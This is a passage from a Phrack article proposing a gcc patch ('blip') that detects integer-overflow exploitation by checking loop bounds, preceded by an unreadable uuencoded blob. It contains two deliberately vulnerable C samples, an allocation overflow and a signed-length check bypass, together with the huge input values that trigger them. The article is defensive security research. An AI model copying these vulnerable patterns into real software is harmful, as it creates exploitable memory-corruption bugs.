MA+U)8X0L\[email protected]?;;X,(LZK66][email protected]!87]?4A,/VFKJNE36CO=CA:8C%*
M`*IID,%<FLS0?#[email protected]$#I$JKB4\?(2-*B0ML7`M`E^%EI4VNORT^G2S/@@IW%
M$V`+G:-/[email protected]:IH]^(%[TP^($W;-#OU"Q:%N<O6,T&\]_#X3DF\5E:'YRI
M,2L\Y_F]7"Q.TA9,4X7GI*G4(7QRP62:JGCN(WR4MWNR*3U99,=ZR7*[email protected]
MMSE`*F?+DK?<G;B=(WJS%('\HI:VHLN$KB-52>Q$!30RE<2/52!M"[[email protected]
M,[]*1RM*G4D_L21>%4OL51%#Q/V`[email protected](7%C(?9&M]!B1.*B\;9F;Y>&@]C73
M>:[email protected]&]T5\JR+J!<B<"\-IM[,LPU""/6Z3>,1KMH1E;0F(@S26=66(
M])8M86\Q13'AVMG6H1*!47-_9;'G0\([email protected]_6QI*J'/I8$QNQX!,)
M0:0FJFH[[BP2)!#%4;;O,X\KG?H"63K^Z(_1ZC-_H1=`]"([email protected]`(&@PU(2:#R
MPGMJZ"J!J5AP[Q&[email protected]^Z-K6V[+E1OU_)ZG?"&[email protected]"KNW-+RE
M08$;Y!51M,KT:[email protected]>M#^@9^/Z..DTJ^(QK3I`QWW!#5Y/O6*S4WEI0F`Y
M1`([email protected]<GDL,>OA#1TVZ[[email protected]@C=4D0D7O#&76YBX.Z>HC%CNW7H0E;EB1[B4
MHQRM.+7Z1P=0(-6"56Z\-W/#<[email protected]`2%\6H.Y#>3UL7KGS4)0XU:DZ)MFH
MD,+UYJB6;H_D&[email protected]*:;()/;;VCI3XAJ*H>&J.$^DD;$0`>[email protected]@J%FIEX!A
M.%&R3M6!6HE['L^&+MA[;1"($YKIJ'[email protected]%)K")$IY:)JBB(%AH=T.'3>`'R%
MZ)^.VP;5P7;[email protected]#_I',I`H":XE,&(-#WF#S2&`)S,T*90=7E)>33B<A
M+HM\'856$R4&P\VO9(*"SFH[(#[email protected]/@JU&'PA7/,74T&@_B7E\=4SLQ
M4XEL:53*[/:76ZB7"B?<[email protected]=5'[email protected]&<'#N.S5`M4S,U`9'42W8*;5`$
M*^?4*D[:\9$6:"NY/=M=)AR)>$C*"!H2R&.]TO/+R,[email protected])WXW#XCLE]5/56
[email protected]/L%;*S$%"'H2ULWSF/-HXZ>SIH*`&/F7RL,ZJ48'<YEGXZQ"T>.I
ME"0EK,'V0([email protected]=`J:-=S5#]<JDJY#%-=I,*O4.U[K?=6[[1W>N;T1:?7GK[B
M]$M/O_;T6T^[email protected]@3/724:M8:V3`P<[ZYT0.$>!I#0'Z;I1?Z_F
MZN1("ZW'_`[email protected]*T)+A<'Z.<I=KTJ\24V`L__.D3[`N9WKMU6%N_WAL?-)C_XP
M<-I0XSTRI<T?NY&[email protected]_59LQ=OM;OM<M<[PUKO1Q7`[email protected];_YS9OSLVC
M[[email protected]=XN58T<W([email protected]&RVK+="PDS(@9XT(.DMYG8!L;-ERY:<M_?0
M8[`E/=95"XQZCH;T7)(WT+'VMJBH_`9MHV]ZJZ>IMZ77'[[email protected],22`H)0SJ]55
[email protected][[email protected]==3JC<XQYO;OQ8S[:_C[9O7WZ`^9\`W\_&&/YIG\!EM7>4?7>SQ#
M^EZCYOA_?#'A,\3_8?5][email protected]_Y:_MZOOO!5_07U_3(5OYO`CZOL1O5]DY_N:
M_<UKJ7^[email protected])N+^C:@N\KS$6%=4/A7$W8=Q)\&<%W`,SG9U8^<^N9(6]X
M[L16)[email protected]:[email protected]?EXXI6`.7=:L.->HP0X<WBWO`YS?GZ,X,C0R?U>6=
M=;:</.E[KU/K]HR:C&[email protected]^]<3,]_S\^/PE.%_1$\%;'RM_S];7Z>YGA7K*'O
M>!5^[email protected]_Q\TW\;'!XPM\_Q=_W\?-=#/_G_/U9?GZ>GW_.X7_#W[>LI^=M
M_-R[GL)C_GXK?[^+O_\E/W^+X;_+S]N?0^W;Q\]?Y.>O\//%EU*\[email protected],K]
MEUY-SQ?R,W<UA=_`W[=?3>7?Q<\FPP_R\S#'_TG^[email protected]]R_X^7O\_!B'_P=^
M^;G$SSZ''^7OWWH^]==C_'R<GY_DYY<XWBE^[email protected]_X[4YP6,E_Q\[email protected]_.7\
MC_CY!<[G2QS^][email protected]/%]([email protected]:&A_Q=Y><"P]_$WTU^COGY2_Q\#\?[
M3,^K7DSA+^[email protected];]]?E;YN96?._BYAY_S_&QQ^@X_APP_RM\_R<^'^/FO
MW8=TU+.CPN#O/>H;_M9XYNYAG4JS[M[5Z^`OY]$^)V$HB-II;D:9J"[email protected]
M[E&@[!U[#G!?F-^5W`:Y.5S+[02^Y7.L.!Z7<;[email protected]/WS57>])_-=;4YKI=D
MW^9ON+]9_:#[email protected][_'BO];5M_DX!\U]@T8\Y(WX%OMM-4ZY*'G2Z\]&":]
MHTIQ^N77P]H`WR^'&B_!ZU-?/*U^+X>:+T'84Y_!;VC!$C3_J9/X#[email protected]
MU*/X#2U:`M1XZCWX#2U;@BOOIQ[&;[email protected][1T*8+O`7Y#BY=NAN^[
M\1M:OG0;?._#;^B!)[email protected]]V,W]`32X#&3^7Q&WIDZ6[XSN$W],P2-.BI#[email protected]
M/;0$5\-/>>K3_Q\_?N(OCG_Y:_L6]B]][email protected]$5<I^:O*^[8^GZGUZ][M2[5(1O
M<.;48_#QU6OF[[email protected]!WT)L_];,*^,C-F&+#VT^^Y4J5<'XIIU:.4__D
M^_$_6/[email protected]>.?WMF^>)3/P=Y?W?U%0]]";*;VW#BXQ]YJRKS0X"XS_R&]XU?
M']_YX!LW7J^J/[[email protected]$6G#O\]5N?$&S=>J[KRAZ":$'+J!H1_<^D$?/Q'
M_"J?MS*[E#*;^3/[email protected]$)YX`!/["^'=,>=<H\(/O.*UP[/%3EZC^#@%I
MOWW1D76?V+YQ(VR,IJ?>_1#DLY8*[email protected]>N+SSWP(=HAO_$LUFAL?_^(EE8^G
MP=HJ7,GM!QS[.&[email protected]\.MJC/KM?4N_!IE<3O'O'VU<4&E.?.WQ4^L9/_X]5GR/
[email protected][Q^-^[email protected]]][1WSRKOR*5/;SGQ+?6N2)_EC2K/QSZMTDBD
MK2O>][email protected]#\3GQ#X9?I%1FE>1ZAW;IG7J46F:ND<6]4&3^]`=(+Y+""G'KI
M%KP;O6W]<:?9>Z5*[email protected](W(W>K;OV[MMW5P8,F>3(N.46;[_Y``G4ZU_>W)1[
MSG'3+][email protected]```*,JZYZ_-'MVXM%[email protected]\$=JY1ZW1R[5K2450Q$-.;D0;/
M]57/8G>]TIO'7E/[email protected]%[00\"RXU2Y$-P55M_\T[HVYS*D^IGHHSZ_5P]
[email protected]>RXU13O3E:;??''=4&6=LWY':L`<JRRPY:F4$<K)0GUZSUNGW6MSF
M8;^K&MX?#(ZM]^:P;=!,*@SK#(\#O=;[email protected]?5C,WM_=6[AKNE;THAE#-P:E$
MO8#O/X[OQ#@[@N]%?'\7OI>H#[email protected]>X?M)?*[email protected]^[email protected]^RR^?P??;\)WD/>Y![D;
MGO=R?'\MOL_B^\WX_CI\WXKO2_A^"[[[email protected]^_;\/T7\'T[OO\K?)_#]R?P_59\
M/XSO_Q+?A_C^<7P?X_M?X/[email protected]_<WX7L+WM^#['GR_!]\7\?TX
MOO\4OK\-W_\9OO\TOO\NOI,T\'^^A/#SA;^@<'X]O=^J%J;-Z\V<@[email protected]:L."
M7V%\$CW_+KY?,Y.-OV&#61->QN^;7VKRR<8O;[email protected]^`_&\_:]V^C'&0$^J]
[email protected]?>PV\_ZNS]MN/7&/6NG^&[V5\_YUKS%KWGZXQ:]TI?*].Y+/JA<"K?:&&
M-SW:9STPJ05*S=W>Z$9%U0UN7*[email protected],[=VT'UG[CQD8ZOM%;;#2"
M&,[email protected]<[9`HI<:`#%O^$F4?3+!WG]4U]^6?]FO<92;[email protected]&4RA^0%;[email protected]]A9S
MIDJ&])S=#%:?<-AT3B:>H()6%/44Y5YC-`ETLT(5ZC7!CW"[email protected]@1Q"$W6*'
MF\'U`XA`JHM'=1O0UG4$4M*LHDQ^UQ1U[[email protected](2UPOB6*[email protected]*
MG(F*<M^K)]=TN9\T*:A"MH0J:,'%.+^H-S:GQ[[email protected]?]=)]A^N%A>'-2B$IT
M>%*==JLV&@^S4)7P1G`4P&#0%[email protected]:!(!;@#5`K$93=(4544'#:XK*0&:W$9-
M<CH`DN)H!0J=?)#F<1R/8T:GD*%@^P#`B+X(#\0$$X`)!=`HD<D"[email protected]=AF
MJ;>"@S8`P;F=DL`$!*9-"EX*!5XP]1P[`:'5+/0RPW!H;[email protected]%$-*"+X[.+2,
MH=1)B?0%H#)V*]R7&6C%0)->GZ%H)RNDBH*[email protected]!]$[F'KMP8'AAXO]T6*+4*
M)5J/CF+P#PE&[email protected]!I*D5-LXV"]UL#4.A8"K7L.'4Q$*1C2-`.)A8E."2Z9AQ
MVE+SNYE*[email protected])H-BTRR]$B]([U?J!AX`[W;$CS,9^"ZX:&%H&3ZD>&[email protected]]J
M*F;(VVD[Z9ATQ;R=CH)TNJ)OH4JO;^"[email protected]?`"[email protected]/,;12GC5JG)CU7#$VS
MZSZ!CI)5/%4J^;L'[email protected]@Y)OS34<,N5A;8,Y\5<6MRNI2,TO;1P?643SR%C
M8+:@#:^[email protected]'3H6<G5OGTVRE#[email protected]?*[email protected]/5,@:7056^J.I&TFL"<+*P?#:2'5G
MBE4`DJ%[email protected]&LL:<?4OJD(M,KX;]9UD1#L!NH%MI(2BT=.[5M:6TN!1/V!
M=D9'UA?5RCJN#9MDP-`VP1B3MA.N$6#[email protected]@5;6CI,WNB!LDCF!ERUZ0
M9CVG'T;8BV7L1;2A1&&PB'!8A&%H5C90JP([>ZKH%[email protected](.35"B2R=MN=+*
MLFRXH*D*MUJE$52!!VCS54*"((,[email protected]#)MSJT(`P)^"5`T*S_1EG
MQ5;&;!(&3.WMV6P][[email protected],3FX[,\C$*<[email protected],K?I,4Q?0LM%(@(&U
[email protected]!B(RC+'AKQXI=CX6C+6K.I%C02.%[email protected]$ZMO%]6JN,QG+'[email protected]!Q:
M>_8=6*B&&[email protected][XKT'%@!:U-"=NW;-[=BZBV.7#'S/MKV[]^V:6YCCH/)$
M>\TF#[M)+P87R:H14`'9HXM"[email protected]">M"2P&UN+:'@N3CNVX
MY`Z3C(;8+(/S=Y:$QT8-J!R:'(4L)6\V`[email protected]:W"(0K05-#7UN%K!VGQM<HIVR
MCE1`!EH!5M9QJ+;H!O=SR9P+^[email protected],2I8!.,J?',[email protected]<(W=&1=ZY#?^L
M+?;&6]CQJO,1#\[email protected]&*?C<BAN3AX&71&4$2B_L57LB[75A!C+X[^;2V1_H"W
M[$#N!R0D+N)X(%?T-?7R'Z;4#R0=0"8(XH$\T.]=1'[email protected]/IA6<Y'[email protected]
[email protected]?VWG.>6"[^&1[H[*%7XMM7K($!LH(EM,_CN6/'6J7CKK'@OL.*[email protected]@W[1A
MY#[D)SHE[[[email protected]&VW9<G_>,_CB/:CZ18P%\B_'SU_A>!CT,.F'73HE
MOT>L>*!/<.D&$V;'^U=6/)`HA?OZ=5/B?="*=XV*=\[email protected]=R:+D-'M_(
MS\]YKDX9Q'M`C9O<J`O>_#?/[email protected]\E'/+EON7F?P^IB;JEZ?4[ZN>:\/Q
M07^3MN(U^IM6]IS^)NN<'?U-TIF`O_3]?([email protected]]/M%J)EH?[\P\_VBS/>+
M`V<N[UN>D2V&]E\TX[9OVOA\QBK_RIG)\/=8_?U"%?[[email protected]>RV8,/EZI
MTI5]+]B&M'1CP1:DS-^KU/Q]_XRK2_ODC*M+^^<SKB[MW\[email protected]'F.]3W
M%SO].OC!!:(\KHV/*NC<;?&M^[?NGB/G?"H1U(+NESQBU&SQ?8^[email protected]@F*7!-Z
MVXY+6ME.2:2:;8.6IQ3"(RRZVVZ5QJ.&FZ4Z/W$"U..>T.RV8S>[email protected]=C)"[email protected]
MV0W5S>U88/@3^MJ&@3:Y4VZ+QGK'KKVW;-T5[[WUUOFYA7AAZRV[[email protected]*
M"8USJV"X9[%S2]*XGBR*1<J,@OF%W_]5/['[email protected]#/Z`R0-BT%(9GL/^2#\MA
M?[GNQ)\\_O1%]S[A;=ARXB67>A_QUMWPK<O7/N9M>[email protected];KN1:KGE[_
MO7^!WS.7?W'[email protected]_<]^;Q'5GF/77R1_X4GGW_JGUSDGWSH\W]06CV#;=KWT,F/
M/W>*?_*1][email protected]?//D=5:T??LD#*@N.>>+//O(>[_Y+CS^^[email protected]^\:LO
MY32?6`-V)IZ\\C=6C];`^_N]+<[email protected][5;3K]$#?OJRT^];Z:]Y;U7>^TM
MC_SF6N[W54^__#%OYH$GC_^/W);[[email protected]^\]#)9S_VT!?4F,[<</J&;WW(6_>-
MKCV5^WN%4J=1>JB::RL*F_U"57-;@WQNL39JY7K]46[[email protected]?]'FA]__!EZ[TK
[email protected]?;S_^Q=7MBT'%L/W(UDNNF'G^:R_Q3W[E:Z?>-?.5KY]ZY\RC
MQ=RV^06X7`N\OWOTGJ\,_E`-W5O6>>,7;?GX&M77#YQ\_-3J+?>]HK;[email protected];
M;O[&S&CMJ9=X7[[[Z:_^QJKQJ?9=3[[email protected]>?-%]7]MXQ7W?_*W5G_WJ'ZV_
MQ5SH?[%:L?)M8.6_<]#_/KX+_1\[email protected]?XO%R[0__\@O\=.KN6E]$-J+?[6#:>?
M>&[email protected]?O\/9C[PBX\\,7/OLY^:22][M__9#WNK'IM9I7:>4X30'[K$^^VU
[email protected]^^')[email protected]/A^.<A?F/__$+^%I21%HS9+K5S:'P\;:&8'
M.7>P/GKS4C?W:GK>G":]&LB6O,:*[email protected]%GC91"ID_7I5%//<L<C!L+\XK'77
MC?%PJ#HDUTR&:(/GV);U1UJ=SB9(VJCU<[email protected]@%[-E<_ENLDG3Z8*5H<
[email protected][@09'(_FEMJU9JJ$/2GYQ:LFL,CX::PXXQ'*A;V/51IH_1Z;B-V=29JCLW<
*_Q^/V/4P`[email protected]$````

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x09 of 0x10

|=-------------------=[ Big Loop Integer Protection]=------------------=|
|=--------------=[ Oded Horovitz [email protected] ]=------------=|

--[ Contents

  1 - Introduction

  2 - Part I - Integer problems
    2.1 - Introduction
    2.2 - Basic code samples

  3 - Part II - Exploitation pattern
    3.1 - One input, two interpretations
    3.2 - What is the nature of the input?
    3.3 - Suggested detection

  4 - Part III - Implementation
    4.1 - Introduction 
    4.2 - Why gcc?
    4.3 - A bit about gcc
        4.3.1 - Compilation flow 
        4.3.2 - The AST
        4.3.3 - Getting started 
    4.4 - Patch Goals 
    4.5 - Patch overview
        4.5.1 - Tactics
        4.5.2 - Modifying the AST
    4.6 - Limitations

  5 - References

  6 - Thanks

  7 - Appendix A - Real life examples
    7.1 - Apache Chunked encoding
    7.2 - OpenSSH auth
  8 - Appendix B - Using blip  

--[ 1 - Introduction

Integer overflow and integer sign vulnerabilities are now common 
knowledge. This has led to increased exploitation of integer-related 
vulnerabilities. The article will attempt to suggest a way to detect 
these vulnerabilities by adding compiler support that detects and flags 
integer vulnerabilities exploitations. Specifically a gcc patch is 
presented to demonstrate the feasibility of this technique.

The article is divided into three parts. Part one contains a brief 
introduction to some of the common integer related vulnerabilities. We 
list some of the recent public vulnerabilities. Part two of the article 
tries to explain the root cause of the problem with integer 
vulnerabilities. Using real examples, the article explains why 
exploitation is possible in the first place, and how it may be possible 
to detect exploitation of integer vulnerabilities, even when the 
vulnerability is not known in advance. Part three goes through the 
implementation of the suggested detection scheme. Since the 
implementation of this detection scheme is in the form of a gcc patch, 
introduction information about gcc internals is provided as well. We 
summarize the paper by demonstrating the protection at work against 
OpenSSH and the Apache httpd packages.

--[ 2 - Part I - Integer problems

----[ 2.1 - Introduction

In the last year the attention seems to have shifted to a new bad 
programming practice. This practice is related to the possibility to 
integer overflows that cause buffer overflows. It turns out the many 
popular and (assumed to be) secure software packages (OpenSSH, Apache, 
*BSD kernel) share this vulnerability. The root cause for this bad 
practice is insufficient input validation for integer type input. Integer 
input looks so naive, only a few bits long. What can go wrong here? Well, 
it seems that quite a lot can go wrong. The following is a table of 
integer related vulnerabilities taken from the OpenBSD and FreeBSD 
security lists. All vulnerabilities have been reported during year 2002. 

| Vulnerable package     | Short description of vulnerability           |
| OpenBSD select syscall | Positive limit checks against int value      |
| (See reference [4])    | allowing stack overflow                      |
| RPC xdr_array          | Int overflow cause small buffer allocation   |
|                        | which later overflowed with input            |
| OpenSSH Authentication | Int overflow cause small buffer allocation   |
|                        | which later overflowed with input            |
| Apache chunked-encoding| Positive condition is done on signed int     |
|                        | allowing heap overflow                       |
| FreeBSD get_pallette   | Positive condition is done on signed int     |
|                        | allowing information leak from kernel to user|
| FreeBSD accept1,getsoc-| Positive condition is done on signed int     |
| kname1,getpeername1    | allowing information leak from kernel to user|
 Table 1 - Sample integer vulnerabilities in year 2002.

The common problem that exists in all of the above vulnerabilities is 
that an input of integer type (signed and unsigned) was used to trigger 
overflow (when writing) or info leak (when reading) to/from program 
buffers. All of the above vulnerabilities would have been prevented if 
proper limits had been enforced. 

----[ 2.2 - Basic code samples

Integer vulnerabilities can be further illustrated by looking at the 
following two simple code samples. 

Example 1 (int overflow): 
01	int main(int argc,char* argv[]){

02		unsigned int len,i;
03		char	*buf;
04		if(argc != 3) return -1;
05		len=atoi(argv[1]);

06		buf = (char*)malloc(len+1);
07		if(!buf){
08			printf("Allocation faild\n");
09			return -1;
10		}
11		for(i=0; i < len; i++){
12			buf[i] = _toupper(argv[2][i]);
13		}	
14		buf[i]=0;
15		printf("%s\n",buf);
16	}

The code above seems quite legit. The program converts a string to its 
upper case representation. First it allocates enough space for the string 
and the NULL termination character. Then it converts each character into 
its upcase value. But when looking a bit closer, we can identify two 
major problems in the code. First, the program trusts the user to have as 
much characters as he specifies (which is obviously not the case)(line 
5). Second, the program doesn't take into account that by calculating the 
space to allocate, an integer overflow may occur (line 6). Trying to 
generalize the problem, the first bug may allow the attacker to read 
information, which he didn't provide (by trusting the user input and 
reading *len* chars from argv[2]). The second bug allows the attack to 
overflow the heap with its own data, and therefore to fully compromise 
the program.

Example 2 (sign check-bypass):
01	#define BUF_SIZE 10
02	int	max = BUF_SIZE;

03	int main(int argc,char* argv[]){

04		int		len;
05		char	buf[BUF_SIZE];
06		if(argc != 3) return -1;
07		len=atoi(argv[1]);

08		if(len < max){
09			memcpy(buf,argv[2],len);
10			printf("Data copied\n");
11		}
12		else
13			printf("Too much data\n");
14	}

The second example shows a program that had the intention to solve the 
problem introduced in the first example, by attempting to enforce user 
input length to a known and predefined maximum value. The problem in this 
code is that len is defined as a signed int. In this case a very big 
value (unsigned wise) is interpreted as a negative value (line 8), which 
will bypass the limit check. Still, in line 9 the same value is 
interpreted as an unsigned positive number causing a buffer overflow and 
possibly allowing a full compromise.

--[ 3 - Part II  - Exploitation pattern

----[ 3.1 - One input, two interpretations

So what is the real problem? How come such security-oriented packages 
have these vulnerabilities? The answer is that integer inputs sometimes 
have an ambiguous interpretation at different parts of the code (integer 
may change their sign at different values, implicit type cast, integer 
overflows). That ambiguous interpretation is hard to notice when 
implementing input validation code.

To explain this ambiguity let us look at the first example. At the time 
of allocation (line 6), the code believes that since the input is a 
number, then adding another number will yield a bigger number (len+1). 
But since typical C language programs ignore integer overflows the 
particular number 0xffffffff do not apply to this assumption and yields 
unexpected result (zero). Unfortunately the same error is *NOT* repeated 
later in the code. Therefore the same input 0xffffffff this time 
interpreted as an unsigned value (a huge positive number). 

In the second example the ambiguity of the input is even more obvious. 
Here the code includes a silent type casting generated by the compiler 
when calling memcpy. The code therefore is checking the value of the 
input as if it was a signed number (line 8) while using it to copy data 
as if it was an unsigned (line 9). 

This ambiguity is invisible for the coder eye, and may go undetected, 
leaving the code vulnerable to this "stealthy" attack.

----[ 3.2 - What is the nature of the input?

Looking back at the above examples reveal a common meaning for the 
attacker input. (Sorry if the next few lines will explain the obvious :>) 
The above input is a number for a reason. It is a counter! It counts 
items! It doesn't matter what those "items" are (bytes, chars, objects, 
files, etc.). They are still countable amount of items. And what can you 
do with such a counter? Well, you are most likely to do some processing 
"count" amount of times. As a note I will say that not *every* number is 
also a counter. There are many other reasons to have numbers around. But 
the one that are related to integer vulnerabilities happend to be 
"counters" most of the time.

For example, if the count is for challenge response you may want to read 
"count" amount of responses (OpenSSH). Or if the count is buffer length 
you may want to copy "count" amount of bytes from one memory location to 
the other (Apache httpd). 

The bottom line is that somewhere behind this number there is the proper 
"loop" in the code that will do some processing, "count" number of times. 
This "loop" may have multiple forms such as the for-loop in the first 
example, or as an implicit loop in memcpy. Still all loop flavors will 
end up looping around the "count".

----[ 3.3 - Suggested detection

Ok, what do we have so far about those vulnerabilities?
- The input was ambiguously used in the code.
- Somewhere in the code there is a loop that uses the input integer as an 
iteration counter. 

To make the interpretation of the number ambiguous, the attacker has to 
send a huge number. Looking at the first example we can see that in order 
to make the number ambiguous the attacker needed to send such a big 
number that if doing (len+1) the number will overflow. For that to happen 
the attacker will have to send the value 0xffffffff. Looking at the 
second example, in order to make the interpretation of the number 
ambiguous, the attacker needs to send such a number that will fall into 
the negative range of an integer 0x80000000-0xffffffff. 

The same huge number sent by the attacker to trigger the vulnerability is 
later used in a loop as the iterations counter (As discussed in the 
section "What is the nature of the input?") 

Now lets analyze the exploit process:

1. Attacker wants to overflow buffer.
2. Attacker may use integer vulnerability
3. Attacker sends a huge integer to trigger the vulnerability.
4. Count loop executes (probably) using attacker input as the loop bound.
5. A Buffer is overflowed (On early iterations of the loop!)

Therefore detecting (and preventing) integer vulnerability exploitation 
is possible by validating the loop bounds before its execution. The 
validation of the loop will check that the loop limit is not above a 
predefined threshold, and if the limit is higher that the threshold a 
special handler will be triggered to handle the possible exploitation. 

Since the value required to trigger most integer vulnerabilities is huge, 
we can assume (hope) that most legitimate loops will not trigger this 

To get a feeling for what values we expect to see in integer 
Vulnerabilities, lets examine the following samples:

- Allocating buffer for user data + program data

Looks like: buf = malloc(len + sizeof(header));

In this case the value required for triggering int overflow is very close 
to 0xffffffff since most program struct sizes are in the range of several 
bytes to hundreds bytes at most.

- Allocating arrays

looks like: buf = malloc(len * sizeof(object));

In this case the value required for triggering the overflow may be much 
smaller then in the first example but it is still a relatively huge 
value. For example if sizeof(object) == 4 then the value should be bigger 
then 0x40000000 (one Giga). Even if the sizeof(object)== 64 the value 
should be bigger then 0x4000000 (64 Mega) in order to cause an overflow.

- Falling to negative range

In this case the value required to make a number negative is any number 
bigger then 0x7fffffff. 

Looking at the values required to trigger the integer vulnerability, we 
can choose a threshold such as 0x40000000 (One Giga) that will handle 
most cases. Or we can select smaller threshold for better protection, 
which may trigger some false positives.

--[ 4 - Part III - Implementation

----[ 4.1 - Introduction 

Once we have a suggested a way to detect integer attacks, it will be nice 
to implement a system based on that idea. A possible candidate for 
implementing this system is to extend an existing compiler. Since the 
compiler knows about all loops in the application, it will be possible 
for the compiler to add the appropriate security checks before any "count 
loop". Doing so will secure the application without any knowledge of the 
specific vulnerability.

Therefore I choose to implement this system as a gcc patch and name it 
"Big Loop Integer Protection" a.k.a blip. Using the -fblip flag one may 
now be able to protect his application from the next yet to be public 
integer exploit.

----[ 4.2 - Why gcc?

Choosing gcc was not a tough decision. First this compiler is one of the 
most common compilers in the Linux, *nix world. Therefore, patching gcc 
will allow protecting all applications compiled with gcc. Second, the 
gcc is open-source therefore it may be feasible to implement this patch 
in the first place. Third, previous security patches were implemented as 
gcc patches (StackGaurd, ProPolice).So why not follow their wisdom? 

----[ 4.3 - A bit about gcc

Well.., all happy I set down knowing that I'm about to make a gcc patch 
for preventing integer attacks. But, except of that, what do I really 
know about gcc at all? I must admit that the answer for that question was 
- "not much". 

To overcome this little problem, I was looking for some documentation 
about gcc internals. I also hoped to find something similar to what I 
wanted to do, which already exists. Fast enough, it was clear that before 
jumping to other examples, I must understand the gcc beast. 

.. Two weeks later, I have read enough of the gcc internal documentation, 
and I spent enough time in debugging sessions of the compiler, to be able 
to start modifying the code. However before I start jumping into details 
I would like to provide some background about how gcc works, which I hope 
the reader will find useful.

------[ 4.3.1 - Compilation flow 

The gcc compiler is really an amazing machine. The design goals of gcc 
include the ability to support multiple programming languages, which 
later can be compiled into multiple platforms and instruction sets. In 
order to achieve such a goal, the compiler uses several abstraction 

At first, a language file is processed (parsed) by a language "Front 
End". Whenever you invoke the gcc compiler, the compiler will decide 
which of the available "Front End"s is good for parsing the input files, 
and will execute that  "Front End". The "Front End" will parse the whole 
input file and will convert it (using many global helper functions) to an 
"Abstract Syntax Tree" (AST). By doing so the "Front End" makes the 
original programming language transparent to the gcc "Back End". The AST 
as its name suggests, is a data-structure, which resides in memory and 
can represent all the features of all the programming languages gcc 

Whenever the "Front End" finishes to parse a complete function, and 
converts it to an AST representation, a gcc function called 
rest_of_compilation is being called. This function takes down the AST 
output from the parser and "expands" it into a "Register Transfer 
Language" (RTL). The RTL, which is the "expanded" version of the AST, is 
then processed again and again through the many different phases of 

To get a feeling for work that is done on the RTL tree, a subset 
list of the different phases is:
 - Jump Optimization
 - CSE (Common sub-expression elimination)
 - Data flow analysis
 - Instruction combination
 - Instruction scheduling
 - Basic block reordering
 - Branch shortening
 - Final (code generation)

I've selected only a few phases out of the big list of phases to 
demonstrate the work done on RTL. The full list is quite more extensive 
and can be found in the gcc internal docs (see "Getting started" for link 
to docs). The nice thing about RTL is that all those phases are performed 
independent of the target machine. 

The last phase which is performed on the RTL tree, will be the "final" 
phase. At that point the RTL representation is ready to be substituted by 
actual assembly instructions that deal with the specific architecture. 
This phase is possible due to the fact that the gcc maintains an abstract 
definition of "machine modes". A set of files that can describe each 
supported machine hardware, and instruction set in a way that makes it 
possible to translate RTL to the appropriate machine code.

------[ 4.3.2 - The AST

I will now focus on the AST, which I will refer to as the "TREE". This 
TREE is the output of the front end parsing of a language file. The TREE 
contains all the information existing in the source file which is 
required for code generation (e.g. declaration, functions, types..). In 
addition the TREE also includes some of the attributes and implicit 
transformations that the compiler may choose to perform (e.g. type 
conversion, auto variables..). 

Understanding the TREE is critical for creating this patch. Fortunately 
the TREE is well structured and even if its object-oriented-like-
programming-using-c is overwhelming at first, after a few debugging 
sessions, every thing starts to fall in place. 

The core data structure of the TREE is the tree_node (defined in tree.h). 
This structure is actually one big union that can represent any piece of 
information. The way it works is that any tree node has its code, which 
is accessible using "TREE_CODE (tree node)". Using this code the compiler 
may know which of the union fields are relevant for that node (e.g. A 
constant number will have the TREE_CODE() == INTEGER_CST, therefore the 
node->int_cst is going to be the union member that will have the valid 
information.). As a note, I will say that there is no need to access any 
of the tree node structure fields directly. For each and every field in 
that structure there is a dedicated macro that uniforms the access to 
that field. In most cases this macro will contain some additional checks 
of the node, and maybe even some logic to execute whenever access to that 
field is made (e.g. DECL_RTL which is responsible to retrieve the RTL 
representation of a TREE node, will call make_decl() if no RTL expression 
exists for that node).

So we know about the TREE and tree node, and we know that each node can 
represent many different things, what else is important to know about the 
tree nodes? Well, one thing is the way tree nodes are linked to each 
other. I will try to give a few sample scenarios that represent most of 
the cases where one tree node is related to another one.

Reference I - Chains:
A chain is a relation that can be best described as a list. When the 
compiler needs to maintain a list of nodes *that don't have any link-
related information*, it will simply use the chain field of the tree node 
(accessible using the TREE_CHAIN() macro). An example for such a case is 
the list of statements nodes in a function body. For each statement in a 
COMPOUND_STMT list there is a chained statement that represents the 
following statement in the code.

Reference II - Lists:
Whenever simple chaining is not enough, the compiler will use a special 
tree node code of TREE_LIST. TREE_LIST allows the compiler to save some 
information attached to each item on the list. To do so each item in the 
list is represented by three tree nodes. The first tree node will have 
the code TREE_LIST. This tree node will have the TREE_CHAIN pointing to 
the next node in the list. It will have the TREE_VALUE pointing to the 
actual tree node item, and it will also have TREE_PURPOSE which may point 
to another tree node that holds extra information about this item meaning 
in the list. As an example the tree node of code CALL_EXPR, will have a 
TREE_LIST as its second operand. This list will represent the parameters 
sent to the called function.

Reference III - Direct reference:
Many of the tree node fields are tree nodes themselves. It may be 
confusing at first glance, but it will be clear soon enough. A few common 
examples are:
 - TREE_TYPE this field represent the type of a tree node. For example 
each tree node with expression code must have a type. 

 - DECL_NAME whenever some declaration tree nodes have a name, it will 
not exist as a string pointed directly by the declaration tree node. 
Instead using the DECL_NAME one can get access to another tree node of 
code IDENTIFIER_NODE. The latter will have the requested name 

 - TREE_OPERAND() One of the most commonly used references. Whenever 
there is a tree node, which has a defined number of "child" tree nodes, 
the TREE_OPERAND() array will be used (e.g. tree node of code IF_STMT 
will have TREE_OPERAND(t,0) as a COND_EXPR node, TREE_OPERAND(t,1) as the 
THEN_CLAUSE statement node, and TREE_OPERAND(t,2) as the ELSE_CLAUSE 
statement tree node.)

Reference IV - Vectors:
Last and quite less common is the tree node vector. This container, which 
is accessible using the TREE_VEC_XXX macros, is used to maintain varying 
size vectors.
There is a lot more to know about AST tree nodes for which the gcc 
internal documents may have better and more complete explanations. So I 
will stop my AST overview here with a suggestion to read the docs.

In addition to storing the abstract code in the AST. There are several 
global structures, which are being extensively used by the compiler. I 
will try to name a few of those global structures that I found very 
useful to checkout while doing some debugging sessions.

  - current_stmt_tree : provides the last added stmt to the tree , last 
expression type, and the expression file name.

  - current/global_binding_level : provides binding information, 
such as defined names in a particular binding level, and block pointers

  - lineno : var containing the line number that is parsed at the moment
  - input_filename: file name that is parsed at the moment

------[ 4.3.3 - Getting started 

If you want to experience the AST tree yourself, or to dig into the patch 
details, it is recommended to read this getting started section. You are 
safe to continue to the next section if you do not wish to do that.

First thing first, get the compiler source code. The version I used as 
base for this patch is gcc 3.2. For information about download and build 
of the compiler please check 

(Please remember to specify the compiler version you wish to download. 
The default version may be the last-release, which was not checked 
against this patch)

